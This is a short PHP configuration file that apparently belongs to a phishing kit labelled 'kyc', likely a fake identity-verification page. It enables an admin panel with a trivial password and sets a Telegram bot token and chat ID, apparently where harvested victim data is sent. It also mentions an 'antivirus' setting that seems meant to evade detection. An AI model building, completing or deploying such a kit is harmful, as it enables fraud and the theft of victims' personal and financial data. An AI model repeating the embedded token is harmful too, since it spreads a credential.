<?php 
session_start();
error_reporting(1);


// Turn ON the antivirus on Anticonfig
$adminpanel = 1;                   # <--- ENABLE ADMIN PANEL
$adminpass = "1";                   # <--- YOUR PASSWORD TO VIEW ADMIN PANEL

$scamname = "kyc"; //
//Your Email
$send = "";
//Telegram Bot Token
$TGBO = '8780070698:AAGhYvCs7qyfB5ZJrnrR1MUe9yGUfxDp-bU';
//Telegram ChatID 
$cID = '7674452745';
?>
